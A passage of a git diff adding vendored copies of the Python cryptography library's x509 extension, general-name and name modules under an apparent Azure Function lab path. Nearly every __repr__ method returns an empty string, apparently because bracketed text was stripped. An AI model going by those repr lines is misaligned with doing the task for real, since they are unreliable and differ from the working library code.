ExtensionOID.OCSP_NO_CHECK + + def __eq__(self, other: object) -> bool: + if not isinstance(other, OCSPNoCheck): + return NotImplemented + + return True + + def __hash__(self) -> int: + return hash(OCSPNoCheck) + + def __repr__(self) -> str: + return "" + + def public_bytes(self) -> bytes: + return rust_x509.encode_extension_value(self) + + +class PrecertPoison(ExtensionType): + oid = ExtensionOID.PRECERT_POISON + + def __eq__(self, other: object) -> bool: + if not isinstance(other, PrecertPoison): + return NotImplemented + + return True + + def __hash__(self) -> int: + return hash(PrecertPoison) + + def __repr__(self) -> str: + return "" + + def public_bytes(self) -> bytes: + return rust_x509.encode_extension_value(self) + + +class TLSFeature(ExtensionType): + oid = ExtensionOID.TLS_FEATURE + + def __init__(self, features: typing.Iterable["TLSFeatureType"]) -> None: + features = list(features) + if ( + not all(isinstance(x, TLSFeatureType) for x in features) + or len(features) == 0 + ): + raise TypeError( + "features must be a list of elements from the TLSFeatureType " + "enum" + ) + + self._features = features + + __len__, __iter__, __getitem__ = _make_sequence_methods("_features") + + def __repr__(self) -> str: + return "".format(self) + + def __eq__(self, other: object) -> bool: + if not isinstance(other, TLSFeature): + return NotImplemented + + return self._features == other._features + + def __hash__(self) -> int: + return hash(tuple(self._features)) + + def public_bytes(self) -> bytes: + return rust_x509.encode_extension_value(self) + + +class TLSFeatureType(utils.Enum): + # status_request is defined in RFC 6066 and is used for what is commonly + # called OCSP Must-Staple when present in the TLS Feature extension in an + # X.509 certificate. + status_request = 5 + # status_request_v2 is defined in RFC 6961 and allows multiple OCSP + # responses to be provided. It is not currently in use by clients or + # servers. + status_request_v2 = 17 + + +_TLS_FEATURE_TYPE_TO_ENUM = {x.value: x for x in TLSFeatureType} + + +class InhibitAnyPolicy(ExtensionType): + oid = ExtensionOID.INHIBIT_ANY_POLICY + + def __init__(self, skip_certs: int) -> None: + if not isinstance(skip_certs, int): + raise TypeError("skip_certs must be an integer") + + if skip_certs < 0: + raise ValueError("skip_certs must be a non-negative integer") + + self._skip_certs = skip_certs + + def __repr__(self) -> str: + return "".format(self) + + def __eq__(self, other: object) -> bool: + if not isinstance(other, InhibitAnyPolicy): + return NotImplemented + + return self.skip_certs == other.skip_certs + + def __hash__(self) -> int: + return hash(self.skip_certs) + + @property + def skip_certs(self) -> int: + return self._skip_certs + + def public_bytes(self) -> bytes: + return rust_x509.encode_extension_value(self) + + +class KeyUsage(ExtensionType): + oid = ExtensionOID.KEY_USAGE + + def __init__( + self, + digital_signature: bool, + content_commitment: bool, + key_encipherment: bool, + data_encipherment: bool, + key_agreement: bool, + key_cert_sign: bool, + crl_sign: bool, + encipher_only: bool, + decipher_only: bool, + ) -> None: + if not key_agreement and (encipher_only or decipher_only): + raise ValueError( + "encipher_only and decipher_only can only be true when " + "key_agreement is true" + ) + + self._digital_signature = digital_signature + self._content_commitment = content_commitment + self._key_encipherment = key_encipherment + self._data_encipherment = data_encipherment + self._key_agreement = key_agreement + self._key_cert_sign = key_cert_sign + self._crl_sign = crl_sign + self._encipher_only = encipher_only + self._decipher_only = decipher_only + + @property + def digital_signature(self) -> bool: + return self._digital_signature + + @property + def content_commitment(self) -> bool: + return self._content_commitment + + @property + def key_encipherment(self) -> bool: + return self._key_encipherment + + @property + def data_encipherment(self) -> bool: + return self._data_encipherment + + @property + def key_agreement(self) -> bool: + return self._key_agreement + + @property + def key_cert_sign(self) -> bool: + return self._key_cert_sign + + @property + def crl_sign(self) -> bool: + return self._crl_sign + + @property + def encipher_only(self) -> bool: + if not self.key_agreement: + raise ValueError( + "encipher_only is undefined unless key_agreement is true" + ) + else: + return self._encipher_only + + @property + def decipher_only(self) -> bool: + if not self.key_agreement: + raise ValueError( + "decipher_only is undefined unless key_agreement is true" + ) + else: + return self._decipher_only + + def __repr__(self) -> str: + try: + encipher_only = self.encipher_only + decipher_only = self.decipher_only + except ValueError: + # Users found None confusing because even though encipher/decipher + # have no meaning unless key_agreement is true, to construct an + # instance of the class you still need to pass False. + encipher_only = False + decipher_only = False + + return ( + "" + ).format(self, encipher_only, decipher_only) + + def __eq__(self, other: object) -> bool: + if not isinstance(other, KeyUsage): + return NotImplemented + + return ( + self.digital_signature == other.digital_signature + and self.content_commitment == other.content_commitment + and self.key_encipherment == other.key_encipherment + and self.data_encipherment == other.data_encipherment + and self.key_agreement == other.key_agreement + and self.key_cert_sign == other.key_cert_sign + and self.crl_sign == other.crl_sign + and self._encipher_only == other._encipher_only + and self._decipher_only == other._decipher_only + ) + + def __hash__(self) -> int: + return hash( + ( + self.digital_signature, + self.content_commitment, + self.key_encipherment, + self.data_encipherment, + self.key_agreement, + self.key_cert_sign, + self.crl_sign, + self._encipher_only, + self._decipher_only, + ) + ) + + def public_bytes(self) -> bytes: + return rust_x509.encode_extension_value(self) + + +class NameConstraints(ExtensionType): + oid = ExtensionOID.NAME_CONSTRAINTS + + def __init__( + self, + permitted_subtrees: typing.Optional[typing.Iterable[GeneralName]], + excluded_subtrees: typing.Optional[typing.Iterable[GeneralName]], + ) -> None: + if permitted_subtrees is not None: + permitted_subtrees = list(permitted_subtrees) + if not permitted_subtrees: + raise ValueError( + "permitted_subtrees must be a non-empty list or None" + ) + if not all(isinstance(x, GeneralName) for x in permitted_subtrees): + raise TypeError( + "permitted_subtrees must be a list of GeneralName objects " + "or None" + ) + + self._validate_ip_name(permitted_subtrees) + + if excluded_subtrees is not None: + excluded_subtrees = list(excluded_subtrees) + if not excluded_subtrees: + raise ValueError( + "excluded_subtrees must be a non-empty list or None" + ) + if not all(isinstance(x, GeneralName) for x in excluded_subtrees): + raise TypeError( + "excluded_subtrees must be a list of GeneralName objects " + "or None" + ) + + self._validate_ip_name(excluded_subtrees) + + if permitted_subtrees is None and excluded_subtrees is None: + raise ValueError( + "At least one of permitted_subtrees and excluded_subtrees " + "must not be None" + ) + + self._permitted_subtrees = permitted_subtrees + self._excluded_subtrees = excluded_subtrees + + def __eq__(self, other: object) -> bool: + if not isinstance(other, NameConstraints): + return NotImplemented + + return ( + self.excluded_subtrees == other.excluded_subtrees + and self.permitted_subtrees == other.permitted_subtrees + ) + + def _validate_ip_name(self, tree: typing.Iterable[GeneralName]) -> None: + if any( + isinstance(name, IPAddress) + and not isinstance( + name.value, (ipaddress.IPv4Network, ipaddress.IPv6Network) + ) + for name in tree + ): + raise TypeError( + "IPAddress name constraints must be an IPv4Network or" + " IPv6Network object" + ) + + def __repr__(self) -> str: + return ( + "".format(self) + ) + + def __hash__(self) -> int: + if self.permitted_subtrees is not None: + ps: typing.Optional[typing.Tuple[GeneralName, ...]] = tuple( + self.permitted_subtrees + ) + else: + ps = None + + if self.excluded_subtrees is not None: + es: typing.Optional[typing.Tuple[GeneralName, ...]] = tuple( + self.excluded_subtrees + ) + else: + es = None + + return hash((ps, es)) + + @property + def permitted_subtrees( + self, + ) -> typing.Optional[typing.List[GeneralName]]: + return self._permitted_subtrees + + @property + def excluded_subtrees( + self, + ) -> typing.Optional[typing.List[GeneralName]]: + return self._excluded_subtrees + + def public_bytes(self) -> bytes: + return rust_x509.encode_extension_value(self) + + +class Extension(typing.Generic[ExtensionTypeVar]): + def __init__( + self, oid: ObjectIdentifier, critical: bool, value: ExtensionTypeVar + ) -> None: + if not isinstance(oid, ObjectIdentifier): + raise TypeError( + "oid argument must be an ObjectIdentifier instance." + ) + + if not isinstance(critical, bool): + raise TypeError("critical must be a boolean value") + + self._oid = oid + self._critical = critical + self._value = value + + @property + def oid(self) -> ObjectIdentifier: + return self._oid + + @property + def critical(self) -> bool: + return self._critical + + @property + def value(self) -> ExtensionTypeVar: + return self._value + + def __repr__(self) -> str: + return ( + "" + ).format(self) + + def __eq__(self, other: object) -> bool: + if not isinstance(other, Extension): + return NotImplemented + + return ( + self.oid == other.oid + and self.critical == other.critical + and self.value == other.value + ) + + def __hash__(self) -> int: + return hash((self.oid, self.critical, self.value)) + + +class GeneralNames: + def __init__(self, general_names: typing.Iterable[GeneralName]) -> None: + general_names = list(general_names) + if not all(isinstance(x, GeneralName) for x in general_names): + raise TypeError( + "Every item in the general_names list must be an " + "object conforming to the GeneralName interface" + ) + + self._general_names = general_names + + __len__, __iter__, __getitem__ = _make_sequence_methods("_general_names") + + @typing.overload + def get_values_for_type( + self, + type: typing.Union[ + typing.Type[DNSName], + typing.Type[UniformResourceIdentifier], + typing.Type[RFC822Name], + ], + ) -> typing.List[str]: + ... + + @typing.overload + def get_values_for_type( + self, + type: typing.Type[DirectoryName], + ) -> typing.List[Name]: + ... + + @typing.overload + def get_values_for_type( + self, + type: typing.Type[RegisteredID], + ) -> typing.List[ObjectIdentifier]: + ... + + @typing.overload + def get_values_for_type( + self, type: typing.Type[IPAddress] + ) -> typing.List[_IPADDRESS_TYPES]: + ... + + @typing.overload + def get_values_for_type( + self, type: typing.Type[OtherName] + ) -> typing.List[OtherName]: + ... + + def get_values_for_type( + self, + type: typing.Union[ + typing.Type[DNSName], + typing.Type[DirectoryName], + typing.Type[IPAddress], + typing.Type[OtherName], + typing.Type[RFC822Name], + typing.Type[RegisteredID], + typing.Type[UniformResourceIdentifier], + ], + ) -> typing.Union[ + typing.List[_IPADDRESS_TYPES], + typing.List[str], + typing.List[OtherName], + typing.List[Name], + typing.List[ObjectIdentifier], + ]: + # Return the value of each GeneralName, except for OtherName instances + # which we return directly because it has two important properties not + # just one value. + objs = (i for i in self if isinstance(i, type)) + if type != OtherName: + return [i.value for i in objs] + return list(objs) + + def __repr__(self) -> str: + return "".format(self._general_names) + + def __eq__(self, other: object) -> bool: + if not isinstance(other, GeneralNames): + return NotImplemented + + return self._general_names == other._general_names + + def __hash__(self) -> int: + return hash(tuple(self._general_names)) + + +class SubjectAlternativeName(ExtensionType): + oid = ExtensionOID.SUBJECT_ALTERNATIVE_NAME + + def __init__(self, general_names: typing.Iterable[GeneralName]) -> None: + self._general_names = GeneralNames(general_names) + + __len__, __iter__, __getitem__ = _make_sequence_methods("_general_names") + + @typing.overload + def get_values_for_type( + self, + type: typing.Union[ + typing.Type[DNSName], + typing.Type[UniformResourceIdentifier], + typing.Type[RFC822Name], + ], + ) -> typing.List[str]: + ... + + @typing.overload + def get_values_for_type( + self, + type: typing.Type[DirectoryName], + ) -> typing.List[Name]: + ... + + @typing.overload + def get_values_for_type( + self, + type: typing.Type[RegisteredID], + ) -> typing.List[ObjectIdentifier]: + ... + + @typing.overload + def get_values_for_type( + self, type: typing.Type[IPAddress] + ) -> typing.List[_IPADDRESS_TYPES]: + ... + + @typing.overload + def get_values_for_type( + self, type: typing.Type[OtherName] + ) -> typing.List[OtherName]: + ... + + def get_values_for_type( + self, + type: typing.Union[ + typing.Type[DNSName], + typing.Type[DirectoryName], + typing.Type[IPAddress], + typing.Type[OtherName], + typing.Type[RFC822Name], + typing.Type[RegisteredID], + typing.Type[UniformResourceIdentifier], + ], + ) -> typing.Union[ + typing.List[_IPADDRESS_TYPES], + typing.List[str], + typing.List[OtherName], + typing.List[Name], + typing.List[ObjectIdentifier], + ]: + return self._general_names.get_values_for_type(type) + + def __repr__(self) -> str: + return "".format(self._general_names) + + def __eq__(self, other: object) -> bool: + if not isinstance(other, SubjectAlternativeName): + return NotImplemented + + return self._general_names == other._general_names + + def __hash__(self) -> int: + return hash(self._general_names) + + def public_bytes(self) -> bytes: + return rust_x509.encode_extension_value(self) + + +class IssuerAlternativeName(ExtensionType): + oid = ExtensionOID.ISSUER_ALTERNATIVE_NAME + + def __init__(self, general_names: typing.Iterable[GeneralName]) -> None: + self._general_names = GeneralNames(general_names) + + __len__, __iter__, __getitem__ = _make_sequence_methods("_general_names") + + @typing.overload + def get_values_for_type( + self, + type: typing.Union[ + typing.Type[DNSName], + typing.Type[UniformResourceIdentifier], + typing.Type[RFC822Name], + ], + ) -> typing.List[str]: + ... + + @typing.overload + def get_values_for_type( + self, + type: typing.Type[DirectoryName], + ) -> typing.List[Name]: + ... + + @typing.overload + def get_values_for_type( + self, + type: typing.Type[RegisteredID], + ) -> typing.List[ObjectIdentifier]: + ... + + @typing.overload + def get_values_for_type( + self, type: typing.Type[IPAddress] + ) -> typing.List[_IPADDRESS_TYPES]: + ... + + @typing.overload + def get_values_for_type( + self, type: typing.Type[OtherName] + ) -> typing.List[OtherName]: + ... + + def get_values_for_type( + self, + type: typing.Union[ + typing.Type[DNSName], + typing.Type[DirectoryName], + typing.Type[IPAddress], + typing.Type[OtherName], + typing.Type[RFC822Name], + typing.Type[RegisteredID], + typing.Type[UniformResourceIdentifier], + ], + ) -> typing.Union[ + typing.List[_IPADDRESS_TYPES], + typing.List[str], + typing.List[OtherName], + typing.List[Name], + typing.List[ObjectIdentifier], + ]: + return self._general_names.get_values_for_type(type) + + def __repr__(self) -> str: + return "".format(self._general_names) + + def __eq__(self, other: object) -> bool: + if not isinstance(other, IssuerAlternativeName): + return NotImplemented + + return self._general_names == other._general_names + + def __hash__(self) -> int: + return hash(self._general_names) + + def public_bytes(self) -> bytes: + return rust_x509.encode_extension_value(self) + + +class CertificateIssuer(ExtensionType): + oid = CRLEntryExtensionOID.CERTIFICATE_ISSUER + + def __init__(self, general_names: typing.Iterable[GeneralName]) -> None: + self._general_names = GeneralNames(general_names) + + __len__, __iter__, __getitem__ = _make_sequence_methods("_general_names") + + @typing.overload + def get_values_for_type( + self, + type: typing.Union[ + typing.Type[DNSName], + typing.Type[UniformResourceIdentifier], + typing.Type[RFC822Name], + ], + ) -> typing.List[str]: + ... + + @typing.overload + def get_values_for_type( + self, + type: typing.Type[DirectoryName], + ) -> typing.List[Name]: + ... + + @typing.overload + def get_values_for_type( + self, + type: typing.Type[RegisteredID], + ) -> typing.List[ObjectIdentifier]: + ... + + @typing.overload + def get_values_for_type( + self, type: typing.Type[IPAddress] + ) -> typing.List[_IPADDRESS_TYPES]: + ... + + @typing.overload + def get_values_for_type( + self, type: typing.Type[OtherName] + ) -> typing.List[OtherName]: + ... + + def get_values_for_type( + self, + type: typing.Union[ + typing.Type[DNSName], + typing.Type[DirectoryName], + typing.Type[IPAddress], + typing.Type[OtherName], + typing.Type[RFC822Name], + typing.Type[RegisteredID], + typing.Type[UniformResourceIdentifier], + ], + ) -> typing.Union[ + typing.List[_IPADDRESS_TYPES], + typing.List[str], + typing.List[OtherName], + typing.List[Name], + typing.List[ObjectIdentifier], + ]: + return self._general_names.get_values_for_type(type) + + def __repr__(self) -> str: + return "".format(self._general_names) + + def __eq__(self, other: object) -> bool: + if not isinstance(other, CertificateIssuer): + return NotImplemented + + return self._general_names == other._general_names + + def __hash__(self) -> int: + return hash(self._general_names) + + def public_bytes(self) -> bytes: + return rust_x509.encode_extension_value(self) + + +class CRLReason(ExtensionType): + oid = CRLEntryExtensionOID.CRL_REASON + + def __init__(self, reason: ReasonFlags) -> None: + if not isinstance(reason, ReasonFlags): + raise TypeError("reason must be an element from ReasonFlags") + + self._reason = reason + + def __repr__(self) -> str: + return "".format(self._reason) + + def __eq__(self, other: object) -> bool: + if not isinstance(other, CRLReason): + return NotImplemented + + return self.reason == other.reason + + def __hash__(self) -> int: + return hash(self.reason) + + @property + def reason(self) -> ReasonFlags: + return self._reason + + def public_bytes(self) -> bytes: + return rust_x509.encode_extension_value(self) + + +class InvalidityDate(ExtensionType): + oid = CRLEntryExtensionOID.INVALIDITY_DATE + + def __init__(self, invalidity_date: datetime.datetime) -> None: + if not isinstance(invalidity_date, datetime.datetime): + raise TypeError("invalidity_date must be a datetime.datetime") + + self._invalidity_date = invalidity_date + + def __repr__(self) -> str: + return "".format( + self._invalidity_date + ) + + def __eq__(self, other: object) -> bool: + if not isinstance(other, InvalidityDate): + return NotImplemented + + return self.invalidity_date == other.invalidity_date + + def __hash__(self) -> int: + return hash(self.invalidity_date) + + @property + def invalidity_date(self) -> datetime.datetime: + return self._invalidity_date + + def public_bytes(self) -> bytes: + return rust_x509.encode_extension_value(self) + + +class PrecertificateSignedCertificateTimestamps(ExtensionType): + oid = ExtensionOID.PRECERT_SIGNED_CERTIFICATE_TIMESTAMPS + + def __init__( + self, + signed_certificate_timestamps: typing.Iterable[ + SignedCertificateTimestamp + ], + ) -> None: + signed_certificate_timestamps = list(signed_certificate_timestamps) + if not all( + isinstance(sct, SignedCertificateTimestamp) + for sct in signed_certificate_timestamps + ): + raise TypeError( + "Every item in the signed_certificate_timestamps list must be " + "a SignedCertificateTimestamp" + ) + self._signed_certificate_timestamps = signed_certificate_timestamps + + __len__, __iter__, __getitem__ = _make_sequence_methods( + "_signed_certificate_timestamps" + ) + + def __repr__(self) -> str: + return "".format( + list(self) + ) + + def __hash__(self) -> int: + return hash(tuple(self._signed_certificate_timestamps)) + + def __eq__(self, other: object) -> bool: + if not isinstance(other, PrecertificateSignedCertificateTimestamps): + return NotImplemented + + return ( + self._signed_certificate_timestamps + == other._signed_certificate_timestamps + ) + + def public_bytes(self) -> bytes: + return rust_x509.encode_extension_value(self) + + +class SignedCertificateTimestamps(ExtensionType): + oid = ExtensionOID.SIGNED_CERTIFICATE_TIMESTAMPS + + def __init__( + self, + signed_certificate_timestamps: typing.Iterable[ + SignedCertificateTimestamp + ], + ) -> None: + signed_certificate_timestamps = list(signed_certificate_timestamps) + if not all( + isinstance(sct, SignedCertificateTimestamp) + for sct in signed_certificate_timestamps + ): + raise TypeError( + "Every item in the signed_certificate_timestamps list must be " + "a SignedCertificateTimestamp" + ) + self._signed_certificate_timestamps = signed_certificate_timestamps + + __len__, __iter__, __getitem__ = _make_sequence_methods( + "_signed_certificate_timestamps" + ) + + def __repr__(self) -> str: + return "".format(list(self)) + + def __hash__(self) -> int: + return hash(tuple(self._signed_certificate_timestamps)) + + def __eq__(self, other: object) -> bool: + if not isinstance(other, SignedCertificateTimestamps): + return NotImplemented + + return ( + self._signed_certificate_timestamps + == other._signed_certificate_timestamps + ) + + def public_bytes(self) -> bytes: + return rust_x509.encode_extension_value(self) + + +class OCSPNonce(ExtensionType): + oid = OCSPExtensionOID.NONCE + + def __init__(self, nonce: bytes) -> None: + if not isinstance(nonce, bytes): + raise TypeError("nonce must be bytes") + + self._nonce = nonce + + def __eq__(self, other: object) -> bool: + if not isinstance(other, OCSPNonce): + return NotImplemented + + return self.nonce == other.nonce + + def __hash__(self) -> int: + return hash(self.nonce) + + def __repr__(self) -> str: + return "".format(self) + + @property + def nonce(self) -> bytes: + return self._nonce + + def public_bytes(self) -> bytes: + return rust_x509.encode_extension_value(self) + + +class IssuingDistributionPoint(ExtensionType): + oid = ExtensionOID.ISSUING_DISTRIBUTION_POINT + + def __init__( + self, + full_name: typing.Optional[typing.Iterable[GeneralName]], + relative_name: typing.Optional[RelativeDistinguishedName], + only_contains_user_certs: bool, + only_contains_ca_certs: bool, + only_some_reasons: typing.Optional[typing.FrozenSet[ReasonFlags]], + indirect_crl: bool, + only_contains_attribute_certs: bool, + ) -> None: + if full_name is not None: + full_name = list(full_name) + + if only_some_reasons and ( + not isinstance(only_some_reasons, frozenset) + or not all(isinstance(x, ReasonFlags) for x in only_some_reasons) + ): + raise TypeError( + "only_some_reasons must be None or frozenset of ReasonFlags" + ) + + if only_some_reasons and ( + ReasonFlags.unspecified in only_some_reasons + or ReasonFlags.remove_from_crl in only_some_reasons + ): + raise ValueError( + "unspecified and remove_from_crl are not valid reasons in an " + "IssuingDistributionPoint" + ) + + if not ( + isinstance(only_contains_user_certs, bool) + and isinstance(only_contains_ca_certs, bool) + and isinstance(indirect_crl, bool) + and isinstance(only_contains_attribute_certs, bool) + ): + raise TypeError( + "only_contains_user_certs, only_contains_ca_certs, " + "indirect_crl and only_contains_attribute_certs " + "must all be boolean." + ) + + crl_constraints = [ + only_contains_user_certs, + only_contains_ca_certs, + indirect_crl, + only_contains_attribute_certs, + ] + + if len([x for x in crl_constraints if x]) > 1: + raise ValueError( + "Only one of the following can be set to True: " + "only_contains_user_certs, only_contains_ca_certs, " + "indirect_crl, only_contains_attribute_certs" + ) + + if not any( + [ + only_contains_user_certs, + only_contains_ca_certs, + indirect_crl, + only_contains_attribute_certs, + full_name, + relative_name, + only_some_reasons, + ] + ): + raise ValueError( + "Cannot create empty extension: " + "if only_contains_user_certs, only_contains_ca_certs, " + "indirect_crl, and only_contains_attribute_certs are all False" + ", then either full_name, relative_name, or only_some_reasons " + "must have a value." + ) + + self._only_contains_user_certs = only_contains_user_certs + self._only_contains_ca_certs = only_contains_ca_certs + self._indirect_crl = indirect_crl + self._only_contains_attribute_certs = only_contains_attribute_certs + self._only_some_reasons = only_some_reasons + self._full_name = full_name + self._relative_name = relative_name + + def __repr__(self) -> str: + return ( + "".format(self) + ) + + def __eq__(self, other: object) -> bool: + if not isinstance(other, IssuingDistributionPoint): + return NotImplemented + + return ( + self.full_name == other.full_name + and self.relative_name == other.relative_name + and self.only_contains_user_certs == other.only_contains_user_certs + and self.only_contains_ca_certs == other.only_contains_ca_certs + and self.only_some_reasons == other.only_some_reasons + and self.indirect_crl == other.indirect_crl + and self.only_contains_attribute_certs + == other.only_contains_attribute_certs + ) + + def __hash__(self) -> int: + return hash( + ( + self.full_name, + self.relative_name, + self.only_contains_user_certs, + self.only_contains_ca_certs, + self.only_some_reasons, + self.indirect_crl, + self.only_contains_attribute_certs, + ) + ) + + @property + def full_name(self) -> typing.Optional[typing.List[GeneralName]]: + return self._full_name + + @property + def relative_name(self) -> typing.Optional[RelativeDistinguishedName]: + return self._relative_name + + @property + def only_contains_user_certs(self) -> bool: + return self._only_contains_user_certs + + @property + def only_contains_ca_certs(self) -> bool: + return self._only_contains_ca_certs + + @property + def only_some_reasons( + self, + ) -> typing.Optional[typing.FrozenSet[ReasonFlags]]: + return self._only_some_reasons + + @property + def indirect_crl(self) -> bool: + return self._indirect_crl + + @property + def only_contains_attribute_certs(self) -> bool: + return self._only_contains_attribute_certs + + def public_bytes(self) -> bytes: + return rust_x509.encode_extension_value(self) + + +class UnrecognizedExtension(ExtensionType): + def __init__(self, oid: ObjectIdentifier, value: bytes) -> None: + if not isinstance(oid, ObjectIdentifier): + raise TypeError("oid must be an ObjectIdentifier") + self._oid = oid + self._value = value + + @property + def oid(self) -> ObjectIdentifier: # type: ignore[override] + return self._oid + + @property + def value(self) -> bytes: + return self._value + + def __repr__(self) -> str: + return ( + "".format(self) + ) + + def __eq__(self, other: object) -> bool: + if not isinstance(other, UnrecognizedExtension): + return NotImplemented + + return self.oid == other.oid and self.value == other.value + + def __hash__(self) -> int: + return hash((self.oid, self.value)) + + def public_bytes(self) -> bytes: + return self.value diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/x509/general_name.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/x509/general_name.py new file mode 100644 index 0000000..eadf0bb --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/x509/general_name.py @@ -0,0 +1,284 @@ +# This file is dual licensed under the terms of the Apache License, Version +# 2.0, and the BSD License. See the LICENSE file in the root of this repository +# for complete details. + + +import abc +import ipaddress +import typing +from email.utils import parseaddr + +from cryptography.x509.name import Name +from cryptography.x509.oid import ObjectIdentifier + + +_IPADDRESS_TYPES = typing.Union[ + ipaddress.IPv4Address, + ipaddress.IPv6Address, + ipaddress.IPv4Network, + ipaddress.IPv6Network, +] + + +class UnsupportedGeneralNameType(Exception): + pass + + +class GeneralName(metaclass=abc.ABCMeta): + @abc.abstractproperty + def value(self) -> typing.Any: + """ + Return the value of the object + """ + + +class RFC822Name(GeneralName): + def __init__(self, value: str) -> None: + if isinstance(value, str): + try: + value.encode("ascii") + except UnicodeEncodeError: + raise ValueError( + "RFC822Name values should be passed as an A-label string. " + "This means unicode characters should be encoded via " + "a library like idna." + ) + else: + raise TypeError("value must be string") + + name, address = parseaddr(value) + if name or not address: + # parseaddr has found a name (e.g. Name ) or the entire + # value is an empty string. + raise ValueError("Invalid rfc822name value") + + self._value = value + + @property + def value(self) -> str: + return self._value + + @classmethod + def _init_without_validation(cls, value: str) -> "RFC822Name": + instance = cls.__new__(cls) + instance._value = value + return instance + + def __repr__(self) -> str: + return "".format(self.value) + + def __eq__(self, other: object) -> bool: + if not isinstance(other, RFC822Name): + return NotImplemented + + return self.value == other.value + + def __hash__(self) -> int: + return hash(self.value) + + +class DNSName(GeneralName): + def __init__(self, value: str) -> None: + if isinstance(value, str): + try: + value.encode("ascii") + except UnicodeEncodeError: + raise ValueError( + "DNSName values should be passed as an A-label string. " + "This means unicode characters should be encoded via " + "a library like idna." + ) + else: + raise TypeError("value must be string") + + self._value = value + + @property + def value(self) -> str: + return self._value + + @classmethod + def _init_without_validation(cls, value: str) -> "DNSName": + instance = cls.__new__(cls) + instance._value = value + return instance + + def __repr__(self) -> str: + return "".format(self.value) + + def __eq__(self, other: object) -> bool: + if not isinstance(other, DNSName): + return NotImplemented + + return self.value == other.value + + def __hash__(self) -> int: + return hash(self.value) + + +class UniformResourceIdentifier(GeneralName): + def __init__(self, value: str) -> None: + if isinstance(value, str): + try: + value.encode("ascii") + except UnicodeEncodeError: + raise ValueError( + "URI values should be passed as an A-label string. " + "This means unicode characters should be encoded via " + "a library like idna." + ) + else: + raise TypeError("value must be string") + + self._value = value + + @property + def value(self) -> str: + return self._value + + @classmethod + def _init_without_validation( + cls, value: str + ) -> "UniformResourceIdentifier": + instance = cls.__new__(cls) + instance._value = value + return instance + + def __repr__(self) -> str: + return "".format(self.value) + + def __eq__(self, other: object) -> bool: + if not isinstance(other, UniformResourceIdentifier): + return NotImplemented + + return self.value == other.value + + def __hash__(self) -> int: + return hash(self.value) + + +class DirectoryName(GeneralName): + def __init__(self, value: Name) -> None: + if not isinstance(value, Name): + raise TypeError("value must be a Name") + + self._value = value + + @property + def value(self) -> Name: + return self._value + + def __repr__(self) -> str: + return "".format(self.value) + + def __eq__(self, other: object) -> bool: + if not isinstance(other, DirectoryName): + return NotImplemented + + return self.value == other.value + + def __hash__(self) -> int: + return hash(self.value) + + +class RegisteredID(GeneralName): + def __init__(self, value: ObjectIdentifier) -> None: + if not isinstance(value, ObjectIdentifier): + raise TypeError("value must be an ObjectIdentifier") + + self._value = value + + @property + def value(self) -> ObjectIdentifier: + return self._value + + def __repr__(self) -> str: + return "".format(self.value) + + def __eq__(self, other: object) -> bool: + if not isinstance(other, RegisteredID): + return NotImplemented + + return self.value == other.value + + def __hash__(self) -> int: + return hash(self.value) + + +class IPAddress(GeneralName): + def __init__(self, value: _IPADDRESS_TYPES) -> None: + if not isinstance( + value, + ( + ipaddress.IPv4Address, + ipaddress.IPv6Address, + ipaddress.IPv4Network, + ipaddress.IPv6Network, + ), + ): + raise TypeError( + "value must be an instance of ipaddress.IPv4Address, " + "ipaddress.IPv6Address, ipaddress.IPv4Network, or " + "ipaddress.IPv6Network" + ) + + self._value = value + + @property + def value(self) -> _IPADDRESS_TYPES: + return self._value + + def _packed(self) -> bytes: + if isinstance( + self.value, (ipaddress.IPv4Address, ipaddress.IPv6Address) + ): + return self.value.packed + else: + return ( + self.value.network_address.packed + self.value.netmask.packed + ) + + def __repr__(self) -> str: + return "".format(self.value) + + def __eq__(self, other: object) -> bool: + if not isinstance(other, IPAddress): + return NotImplemented + + return self.value == other.value + + def __hash__(self) -> int: + return hash(self.value) + + +class OtherName(GeneralName): + def __init__(self, type_id: ObjectIdentifier, value: bytes) -> None: + if not isinstance(type_id, ObjectIdentifier): + raise TypeError("type_id must be an ObjectIdentifier") + if not isinstance(value, bytes): + raise TypeError("value must be a binary string") + + self._type_id = type_id + self._value = value + + @property + def type_id(self) -> ObjectIdentifier: + return self._type_id + + @property + def value(self) -> bytes: + return self._value + + def __repr__(self) -> str: + return "".format( + self.type_id, self.value + ) + + def __eq__(self, other: object) -> bool: + if not isinstance(other, OtherName): + return NotImplemented + + return self.type_id == other.type_id and self.value == other.value + + def __hash__(self) -> int: + return hash((self.type_id, self.value)) diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/x509/name.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/x509/name.py new file mode 100644 index 0000000..381f54b --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/x509/name.py @@ -0,0 +1,445 @@ +# This file is dual licensed under the terms of the Apache License, Version +# 2.0, and the BSD License. See the LICENSE file in the root of this repository +# for complete details. + +import binascii +import re +import sys +import typing +import warnings + +from cryptography import utils +from cryptography.hazmat.bindings._rust import ( + x509 as rust_x509, +) +from cryptography.x509.oid import NameOID, ObjectIdentifier + + +class _ASN1Type(utils.Enum): + BitString = 3 + OctetString = 4 + UTF8String = 12 + NumericString = 18 + PrintableString = 19 + T61String = 20 + IA5String = 22 + UTCTime = 23 + GeneralizedTime = 24 + VisibleString = 26 + UniversalString = 28 + BMPString = 30 + + +_ASN1_TYPE_TO_ENUM = {i.value: i for i in _ASN1Type} +_NAMEOID_DEFAULT_TYPE: typing.Dict[ObjectIdentifier, _ASN1Type] = { + NameOID.COUNTRY_NAME: _ASN1Type.PrintableString, + NameOID.JURISDICTION_COUNTRY_NAME: _ASN1Type.PrintableString, + NameOID.SERIAL_NUMBER: _ASN1Type.PrintableString, + NameOID.DN_QUALIFIER: _ASN1Type.PrintableString, + NameOID.EMAIL_ADDRESS: _ASN1Type.IA5String, + NameOID.DOMAIN_COMPONENT: _ASN1Type.IA5String, +} + +# Type alias +_OidNameMap = typing.Mapping[ObjectIdentifier, str] + +#: Short attribute names from RFC 4514: +#: https://tools.ietf.org/html/rfc4514#page-7 +_NAMEOID_TO_NAME: _OidNameMap = { + NameOID.COMMON_NAME: "CN", + NameOID.LOCALITY_NAME: "L", + NameOID.STATE_OR_PROVINCE_NAME: "ST", + NameOID.ORGANIZATION_NAME: "O", + NameOID.ORGANIZATIONAL_UNIT_NAME: "OU", + 